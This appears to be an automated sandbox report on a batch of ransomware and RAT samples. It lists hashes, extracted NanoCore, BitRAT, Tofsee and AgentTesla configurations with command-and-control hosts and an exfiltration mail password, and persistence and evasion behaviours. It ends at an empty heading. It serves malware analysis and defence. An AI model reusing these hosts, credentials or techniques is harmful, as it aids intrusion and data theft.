Resubmissions
24-10-2024 21:03
241024-zv5dlathjf 1Analysis
-
max time kernel
161s -
max time network
165s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
25-10-2024 17:50
Static task
static1
Behavioral task
behavioral1
Sample
RNSM00439.7z
Resource
win10v2004-20241007-en
General
-
Target
RNSM00439.7z
-
Size
106.7MB
-
MD5
63c3e9eaea5a68b2e6eb2cbe628ebbae
-
SHA1
00e621930a325dbf2af253f92199e720697da9c1
-
SHA256
3446df3ed44fb3b1c5d9da71fbb19c82b44105827aaaab34f68bc30df01a936c
-
SHA512
73e2d4f0393defc504ec8dc20f3c7b5d4e0452d195d42aa5442ba8c88b5b6681a19c6027c6817dc5df32e9548bf4b38e63cd0155094dd41d7e5457ed3b6383a9
-
SSDEEP
3145728:CTYNxP7DTS3kYmW5WiFT81N7bhgRiDqX5tv8qDu:cYNd7DTjYz5W6T81N71g+U1R6
Malware Config
Extracted
tofsee
43.231.4.7
lazystax.ru
Extracted
nanocore
1.2.2.0
dbep.duckdns.org:54920
warqazx.strangled.net:54920
2d2dca86-7818-426c-9e84-55f634ea61fc
-
activate_away_mode
true
-
backup_connection_host
warqazx.strangled.net
-
backup_dns_server
8.8.4.4
-
buffer_size
65535
-
build_time
2021-03-07T16:37:38.065258936Z
-
bypass_user_account_control
true
- bypass_user_account_control_data
-
clear_access_control
true
-
clear_zone_identifier
false
-
connect_delay
4000
-
connection_port
54920
-
default_group
26thmay
-
enable_debug_mode
true
-
gc_threshold
1.048576e+07
-
keep_alive_timeout
30000
-
keyboard_logging
false
-
lan_timeout
2500
-
max_packet_size
1.048576e+07
-
mutex
2d2dca86-7818-426c-9e84-55f634ea61fc
-
mutex_timeout
5000
-
prevent_system_sleep
false
-
primary_connection_host
dbep.duckdns.org
-
primary_dns_server
8.8.8.8
-
request_elevation
true
-
restart_delay
5000
-
run_delay
0
-
run_on_startup
true
-
set_critical_process
true
-
timeout_interval
5000
-
use_custom_dns_server
false
-
version
1.2.2.0
-
wan_timeout
8000
Extracted
agenttesla
Protocol: smtp- Host:
mail.privateemail.com - Port:
587 - Username:
[email protected] - Password:
computer.com
Extracted
bitrat
1.35
wdupdate.duckdns.org:4455
-
communication_password
bfe6c14c945256de12a6add92c83b4d9
-
tor_process
tor
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Agenttesla family
-
Asyncrat family
-
Bitrat family
-
Detect ZGRat V2 2 IoCs
resource yara_rule behavioral1/memory/2976-2926-0x00000000055D0000-0x000000000562A000-memory.dmp family_zgrat_v2 behavioral1/memory/4364-3186-0x000000001C160000-0x000000001C1BA000-memory.dmp family_zgrat_v2 -
Nanocore family
-
Tofsee family
-
Xmrig family
-
Zgrat family
-
AgentTesla payload 1 IoCs
resource yara_rule behavioral1/memory/6524-5631-0x0000000000400000-0x000000000043C000-memory.dmp family_agenttesla -
Renames multiple (121) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
XMRig Miner payload 7 IoCs
resource yara_rule behavioral1/memory/5160-424-0x0000000140000000-0x000000014072E000-memory.dmp xmrig behavioral1/memory/5160-428-0x0000000140000000-0x000000014072E000-memory.dmp xmrig behavioral1/memory/5160-434-0x0000000140000000-0x000000014072E000-memory.dmp xmrig behavioral1/memory/5160-433-0x0000000140000000-0x000000014072E000-memory.dmp xmrig behavioral1/memory/5160-437-0x0000000140000000-0x000000014072E000-memory.dmp xmrig behavioral1/memory/5160-436-0x0000000140000000-0x000000014072E000-memory.dmp xmrig behavioral1/memory/5160-435-0x0000000140000000-0x000000014072E000-memory.dmp xmrig -
Creates new service(s) 2 TTPs
-
Manipulates Digital Signatures 1 TTPs 2 IoCs
Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates\3D4D30CED3EEA9D6DB8F0EA8671B66302A7751C4\Blob = 0f0000000100000014000000fc298202d40c230e4232a1f2b85500b49ac852170200000001000000cc0000001c0000006c0000000100000000000000000000000000000001000000640032003300320063003000350030002d0032003600360066002d0034006300300034002d0039006500300036002d0062006300660030003200340066003500650066003400300000000000000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e003000000000000300000001000000140000003d4d30ced3eea9d6db8f0ea8671b66302a7751c4200000000100000000030000308202fc308201e4a00302010202103cf4440c193950ae4b00fed9a0473ec0300d06092a864886f70d01010505003010310e300c0603550403130541646d696e3020170d3234313032353138333331345a180f32313234313030313138333331345a3010310e300c0603550403130541646d696e30820122300d06092a864886f70d01010105000382010f003082010a0282010100df231982fa970c09aa46c4c3bce44acc0fd7f0792d1df355ed208645ccf19249b5dd381791466e9ffb5d6c3faa1ae7abc9ba47e20bb8d88ce024f02cce46243b8cab4ec6aa5d3e466a0fbaef1c6151ad4ddbc601ff24b0d97128210db2627946dd3cc0fba49bdd6647d0c6deb93288fed04f8efbc5c5c384e6a6b8ab2fe2d8676d23883dc8d910a9ae265a3ee4a9014a4409f56cd6fe7fff412fb369dd0fc0e611a86a37382dfdd59c0fdf8bc32974d2d742664591b798f5dd345af851fa1879788a6140d75637f2b0cd91afc1cd78f63d7d97137677979e5d58f66c2bb3ea41b55b97d601e0d6ca42ddb57493fe27c818895d85e21b87897196cd31f5d1c6dd0203010001a350304e30150603551d25040e300c060a2b0601040182370a0304302a0603551d1104233021a01f060a2b060104018237140203a0110c0f41646d696e40474c5a43534e4c4b0030090603551d1304023000300d06092a864886f70d01010505000382010100aeb85f87c8b4258fe9539cff78632366000eb77b6fdfda4d8cf152620f80aab95ed05b090fdbd011dfcb8c56d75d3c5f4ec3d3de454e9ba963a5cc0d663c9e06eaacb0d0b7606129361dd7b7fe14bea00f3773b569bd285ed8b8b1437d09a0d33b49d5ed1292ea3fe3e3b36f0913b76dfbac002708ce46d0560ab2160934c512422d9c4afdbc1f24afa7ba82ec9ef5db4a57662d750860d35f932398322df9205a91ce794ddb8bd2ef0199d3123367edb39a34b2a0b9cd6a29d9c1f7b47069f99979e47447b2a34344e487b3d0e8b8c29d2b60dfaee1cf1156faf376ef66b4e50e76caebb73e17a5f19b4ed3cb16dff4490dc723651400d59ffdc7b6acebbd58 powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates\3D4D30CED3EEA9D6DB8F0EA8671B66302A7751C4\Blob = 0f0000000100000014000000fc298202d40c230e4232a1f2b85500b49ac852170300000001000000140000003d4d30ced3eea9d6db8f0ea8671b66302a7751c4200000000100000000030000308202fc308201e4a00302010202103cf4440c193950ae4b00fed9a0473ec0300d06092a864886f70d01010505003010310e300c0603550403130541646d696e3020170d3234313032353138333331345a180f32313234313030313138333331345a3010310e300c0603550403130541646d696e30820122300d06092a864886f70d01010105000382010f003082010a0282010100df231982fa970c09aa46c4c3bce44acc0fd7f0792d1df355ed208645ccf19249b5dd381791466e9ffb5d6c3faa1ae7abc9ba47e20bb8d88ce024f02cce46243b8cab4ec6aa5d3e466a0fbaef1c6151ad4ddbc601ff24b0d97128210db2627946dd3cc0fba49bdd6647d0c6deb93288fed04f8efbc5c5c384e6a6b8ab2fe2d8676d23883dc8d910a9ae265a3ee4a9014a4409f56cd6fe7fff412fb369dd0fc0e611a86a37382dfdd59c0fdf8bc32974d2d742664591b798f5dd345af851fa1879788a6140d75637f2b0cd91afc1cd78f63d7d97137677979e5d58f66c2bb3ea41b55b97d601e0d6ca42ddb57493fe27c818895d85e21b87897196cd31f5d1c6dd0203010001a350304e30150603551d25040e300c060a2b0601040182370a0304302a0603551d1104233021a01f060a2b060104018237140203a0110c0f41646d696e40474c5a43534e4c4b0030090603551d1304023000300d06092a864886f70d01010505000382010100aeb85f87c8b4258fe9539cff78632366000eb77b6fdfda4d8cf152620f80aab95ed05b090fdbd011dfcb8c56d75d3c5f4ec3d3de454e9ba963a5cc0d663c9e06eaacb0d0b7606129361dd7b7fe14bea00f3773b569bd285ed8b8b1437d09a0d33b49d5ed1292ea3fe3e3b36f0913b76dfbac002708ce46d0560ab2160934c512422d9c4afdbc1f24afa7ba82ec9ef5db4a57662d750860d35f932398322df9205a91ce794ddb8bd2ef0199d3123367edb39a34b2a0b9cd6a29d9c1f7b47069f99979e47447b2a34344e487b3d0e8b8c29d2b60dfaee1cf1156faf376ef66b4e50e76caebb73e17a5f19b4ed3cb16dff4490dc723651400d59ffdc7b6acebbd58 powershell.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 5964 netsh.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ywwikdvr\ImagePath = "C:\\Windows\\SysWOW64\\ywwikdvr\\hjcnucqg.exe" svchost.exe -
System Binary Proxy Execution: InstallUtil 1 TTPs 2 IoCs
Abuse InstallUtil to proxy execution of malicious code.
description ioc Process File created C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe HEUR-Trojan-Ransom.MSIL.Blocker.gen-ec9d6ecfa11802ce0588b8a5dcd6ffe65e91a8f3a7decf0bbbdb811f1eb321a5.exe Key opened \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\InstallUtil.exe HEUR-Trojan-Ransom.MSIL.Blocker.gen-d838bac7ab25b90356a5280bba7cb299f087c4a90c7a2216b8415140f23ba1e7.exe -
System Binary Proxy Execution: Regsvcs/Regasm 1 TTPs 2 IoCs
Abuse Regasm to proxy execution of malicious code.
description ioc Process File created C:\Users\Admin\AppData\Local\Temp\RegAsm.exe HEUR-Trojan-Ransom.MSIL.Blocker.gen-e6d666ed79c85e0c1eca9dcebf01f9caf42101569b6c6b0e0f8f594814b9661f.exe Key opened \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\RegAsm.exe HEUR-Trojan-Ransom.MSIL.Blocker.gen-0248797389854c9ca071aaf4e3c5e27d4a071524505a8b6afb38c5ab05fbd141.exe -
Checks computer location settings 2 TTPs 11 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation mdwm.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation wdhost.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation HEUR-Trojan-Ransom.MSIL.Crypren.gen-659504fb0ce26a2eee9674759241d81cb60c961423f80da22d41aa39d3d4b1b5.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation HEUR-Trojan-Ransom.MSIL.Blocker.gen-fc438b77f905619ea98ff79f59d7dd9df3f4dd3f40145b79d112a2024dd6f435.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation HEUR-Trojan-Ransom.Win32.Agent.gen-797f540cc4c0e293f6939f43ae351a275cd9a33cf30f4e306bcb66337e790e46.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation HEUR-Trojan-Ransom.MSIL.Blocker.gen-ec9d6ecfa11802ce0588b8a5dcd6ffe65e91a8f3a7decf0bbbdb811f1eb321a5.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation HEUR-Trojan-Ransom.MSIL.Blocker.gen-119cbdd42ca43a301affe289e37e039542d8057e2ea6c664d32a9041fa9e8493.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation HEUR-Trojan-Ransom.MSIL.Blocker.gen-a72c1be94311a312b604bff88ae09c4ef2771e700f6d29fe0227622333c420d5.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation HEUR-Trojan-Ransom.Win32.Blocker.gen-0153670b8240d5173aaab0f884461cdd52364ff3778a8fe6b3d97f4a2a266c31.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation HEUR-Trojan-Ransom.Win32.Crypren.vho-f8bbde46b320fc7c7db3ff2f1792d2bd6e3c4a693043ce2c87f2bdce35109a80.exe -
Cryptocurrency Miner
Makes network request to known mining pool URL.
-
Drops startup file 7 IoCs
description ioc Process File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\desktop.ini.encrypt taskmgr.exe File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\desktop.ini.encryptsize taskmgr.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.encryptSIZE HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!ENCRYPT_NOTICE.log HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\!ENCRYPT_NOTICE.log HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\!encrypt_notice.log taskmgr.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.encrypt HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe -
Executes dropped EXE 64 IoCs
pid Process 2976 HEUR-Trojan-Ransom.MSIL.Blocker.gen-0248797389854c9ca071aaf4e3c5e27d4a071524505a8b6afb38c5ab05fbd141.exe 4836 HEUR-Trojan-Ransom.MSIL.Blocker.gen-119cbdd42ca43a301affe289e37e039542d8057e2ea6c664d32a9041fa9e8493.exe 3592 HEUR-Trojan-Ransom.MSIL.Blocker.gen-2860cedf266d9bb8b33786cddf972c73e294edece6100087802102e9f0100d21.exe 3744 HEUR-Trojan-Ransom.MSIL.Blocker.gen-466074c473b443a133bb651e88e4f11500de7713ef29adaaeb2ff6b5e9278e34.exe 2996 HEUR-Trojan-Ransom.MSIL.Blocker.gen-a72c1be94311a312b604bff88ae09c4ef2771e700f6d29fe0227622333c420d5.exe 3412 HEUR-Trojan-Ransom.MSIL.Blocker.gen-d838bac7ab25b90356a5280bba7cb299f087c4a90c7a2216b8415140f23ba1e7.exe 4364 HEUR-Trojan-Ransom.MSIL.Blocker.gen-e6d666ed79c85e0c1eca9dcebf01f9caf42101569b6c6b0e0f8f594814b9661f.exe 4868 HEUR-Trojan-Ransom.MSIL.Blocker.gen-ec9d6ecfa11802ce0588b8a5dcd6ffe65e91a8f3a7decf0bbbdb811f1eb321a5.exe 5060 HEUR-Trojan-Ransom.MSIL.Blocker.gen-fc438b77f905619ea98ff79f59d7dd9df3f4dd3f40145b79d112a2024dd6f435.exe 1620 HEUR-Trojan-Ransom.MSIL.Crypren.gen-659504fb0ce26a2eee9674759241d81cb60c961423f80da22d41aa39d3d4b1b5.exe 4316 HEUR-Trojan-Ransom.MSIL.Blocker.gen-fc438b77f905619ea98ff79f59d7dd9df3f4dd3f40145b79d112a2024dd6f435.exe 4280 Services.exe 3092 Chrome1.exe 4664 HEUR-Trojan-Ransom.MSIL.Encoder.gen-fc0decc5c2e5ae1f0ec94e669f39014bed2b8777cb9d33e6c40764e9f01d4c1e.exe 2796 HEUR-Trojan-Ransom.Win32.Agent.gen-220a16db1e97f5257b8403d4921ef514e32286a46d322a48c7a36ecfd0fb1494.exe 1368 HEUR-Trojan-Ransom.Win32.Agent.gen-797f540cc4c0e293f6939f43ae351a275cd9a33cf30f4e306bcb66337e790e46.exe 3468 HEUR-Trojan-Ransom.Win32.Blocker.gen-0153670b8240d5173aaab0f884461cdd52364ff3778a8fe6b3d97f4a2a266c31.exe 5112 HEUR-Trojan-Ransom.Win32.Crusis.gen-a7b1df67b4441901670766ab4c13ccb9039b16005f49ed5d96c71c82fc38a8ca.exe 4956 HEUR-Trojan-Ransom.Win32.Crypmod.gen-dc23e2cdcb80b42837c16485811e92a597461e28ed6e170d5958ff0d5f699d09.exe 4964 HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bbf531fd397dbdb4ab9552299c677b007bf08c53f3b5a38628be1742a04e7cf8.exe 4652 HEUR-Trojan-Ransom.Win32.Crypren.vho-f8bbde46b320fc7c7db3ff2f1792d2bd6e3c4a693043ce2c87f2bdce35109a80.exe 5320 HEUR-Trojan-Ransom.Win32.Darkside.gen-d08df92080356816053dbfd234698d8aba26cd7b2839f8d0d1e0d1cba6d3b1d7.exe 5648 HEUR-Trojan-Ransom.Win32.Encoder.gen-941b12b51a319f26c2cd98236677a1fb15026a0c016add36209ba122c4f7bf71.exe 6404 HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe 3956 hjcnucqg.exe 6748 HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe 6760 HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe 6772 HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe 6796 HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe 6864 HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe 6912 HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe 6112 HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe 6124 HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe 6104 HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe 6080 HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe 6100 HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe 6068 HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe 6060 HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe 5956 HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe 6052 HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe 5948 HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe 6136 HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe 5124 HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe 3180 HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe 5132 HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe 1196 HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe 6488 HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe 5380 HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe 5644 HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe 6164 HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe 5628 HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe 6180 HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe 5588 HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe 5560 HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe 6304 HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe 6148 HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe 5636 HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe 5384 HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe 6160 HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe 5580 HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe 5596 HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe 6432 HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe 5932 HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe 6172 HEUR-Trojan-Ransom.Win32.ExPetr.gen-d8efbca2dc1b920e49d5effd9790aee9bb3dc4e88ce0849ea880435e4631580a.exe -
Obfuscated with Agile.Net obfuscator 1 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
resource yara_rule behavioral1/memory/4868-306-0x0000000006A30000-0x0000000006A58000-memory.dmp agile_net -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/files/0x0007000000023caf-274.dat vmprotect behavioral1/memory/1620-275-0x0000000000BA0000-0x0000000000BCE000-memory.dmp vmprotect -
Adds Run key to start application 2 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Chrome1.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Chrome1.exe" HEUR-Trojan-Ransom.MSIL.Blocker.gen-a72c1be94311a312b604bff88ae09c4ef2771e700f6d29fe0227622333c420d5.exe Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\mdwm = "C:\\Users\\Admin\\AppData\\Roaming\\Local\\mdwm.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winscan = "\"C:\\Users\\Admin\\AppData\\Roaming\\winscan.exe\"" HEUR-Trojan-Ransom.MSIL.Blocker.gen-0248797389854c9ca071aaf4e3c5e27d4a071524505a8b6afb38c5ab05fbd141.exe Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HEUR-Trojan-Ransom.MSIL.Blocker.gen-466074c473b443a133bb651e88e4f11500de7713ef29adaaeb2ff6b5e9278e34 = "C:\\Users\\Admin\\AppData\\Roaming\\HEUR-Trojan-Ransom.MSIL.Blocker.gen-466074c473b443a133bb651e88e4f11500de7713ef29adaaeb2ff6b5e9278e34.exe" HEUR-Trojan-Ransom.MSIL.Blocker.gen-466074c473b443a133bb651e88e4f11500de7713ef29adaaeb2ff6b5e9278e34.exe Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MSNCore = "C:\\Users\\Admin\\AppData\\Local\\upNext.exe --i" HEUR-Trojan-Ransom.Win32.Agent.gen-220a16db1e97f5257b8403d4921ef514e32286a46d322a48c7a36ecfd0fb1494.exe Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Chrome Update = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleUpdate.exe" HEUR-Trojan-Ransom.MSIL.Blocker.gen-2860cedf266d9bb8b33786cddf972c73e294edece6100087802102e9f0100d21.exe Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HEUR-Trojan-Ransom.MSIL.Blocker.gen-fc438b77f905619ea98ff79f59d7dd9df3f4dd3f40145b79d112a2024dd6f435 = "C:\\Users\\Admin\\AppData\\Roaming\\HEUR-Trojan-Ransom.MSIL.Blocker.gen-fc438b77f905619ea98ff79f59d7dd9df3f4dd3f40145b79d112a2024dd6f435.exe" HEUR-Trojan-Ransom.MSIL.Blocker.gen-fc438b77f905619ea98ff79f59d7dd9df3f4dd3f40145b79d112a2024dd6f435.exe Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Services.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Services.exe" HEUR-Trojan-Ransom.MSIL.Blocker.gen-119cbdd42ca43a301affe289e37e039542d8057e2ea6c664d32a9041fa9e8493.exe -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA RegAsm.exe -
Drops desktop.ini file(s) 5 IoCs
description ioc Process File created C:\Users\Admin\Videos\desktop.ini HEUR-Trojan-Ransom.MSIL.Encoder.gen-fc0decc5c2e5ae1f0ec94e669f39014bed2b8777cb9d33e6c40764e9f01d4c1e.exe File created C:\Users\Admin\Pictures\desktop.ini HEUR-Trojan-Ransom.MSIL.Encoder.gen-fc0decc5c2e5ae1f0ec94e669f39014bed2b8777cb9d33e6c40764e9f01d4c1e.exe File created C:\Users\Admin\Pictures\Camera Roll\desktop.ini HEUR-Trojan-Ransom.MSIL.Encoder.gen-fc0decc5c2e5ae1f0ec94e669f39014bed2b8777cb9d33e6c40764e9f01d4c1e.exe File created C:\Users\Admin\Pictures\Saved Pictures\desktop.ini HEUR-Trojan-Ransom.MSIL.Encoder.gen-fc0decc5c2e5ae1f0ec94e669f39014bed2b8777cb9d33e6c40764e9f01d4c1e.exe File created C:\Users\Admin\Desktop\desktop.ini HEUR-Trojan-Ransom.MSIL.Encoder.gen-fc0decc5c2e5ae1f0ec94e669f39014bed2b8777cb9d33e6c40764e9f01d4c1e.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 114 2.tcp.ngrok.io 134 2.tcp.ngrok.io 100 pastebin.com 102 pastebin.com -
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
pid Process 4956 HEUR-Trojan-Ransom.Win32.Crypmod.gen-dc23e2cdcb80b42837c16485811e92a597461e28ed6e170d5958ff0d5f699d09.exe 7444 InstallUtil.exe 7444 InstallUtil.exe 7444 InstallUtil.exe 7444 InstallUtil.exe -
Suspicious use of SetThreadContext 7 IoCs
